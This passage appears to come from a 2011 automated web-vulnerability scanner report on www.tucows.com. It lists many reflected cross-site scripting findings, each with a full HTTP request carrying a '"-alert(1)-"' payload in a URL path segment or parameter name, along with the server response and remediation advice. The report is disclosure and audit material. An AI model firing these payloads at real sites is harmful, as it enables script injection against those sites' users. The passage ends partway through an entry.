GET /contact.html?c10ba"-alert(1)-"8abc5e611cd=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 33135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Us</title> < ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d2e"-alert(1)-"560230630e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images39d2e"-alert(1)-"560230630e8/newassets/contact.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:41 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40764"-alert(1)-"3559dd93eff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets40764"-alert(1)-"3559dd93eff/contact.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:58 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffcf"-alert(1)-"e9260562356 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/contact.html3ffcf"-alert(1)-"e9260562356 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:12 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.247. http://www.tucows.com/images/newassets/contact.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c0c"-alert(1)-"83c957dbfec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/contact.html?28c0c"-alert(1)-"83c957dbfec=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:21 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe9d"-alert(1)-"8324c4abd1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesafe9d"-alert(1)-"8324c4abd1e/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:15 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87e88"-alert(1)-"29fef7fc009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets87e88"-alert(1)-"29fef7fc009/includes/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff73f"-alert(1)-"c3006f1651f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesff73f"-alert(1)-"c3006f1651f/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:32 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e6b"-alert(1)-"3078349caa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbarb8e6b"-alert(1)-"3078349caa2/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14a3c"-alert(1)-"0443944911d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.014a3c"-alert(1)-"0443944911d/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 199e2"-alert(1)-"fac9720e4d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.0/css199e2"-alert(1)-"fac9720e4d9/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26131"-alert(1)-"79cf1522983 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.0/css/style.css26131"-alert(1)-"79cf1522983 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:19 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be67"-alert(1)-"26a6c055dc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.0/css/style.css?5be67"-alert(1)-"26a6c055dc5=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:00 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41642"-alert(1)-"3787a403d76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
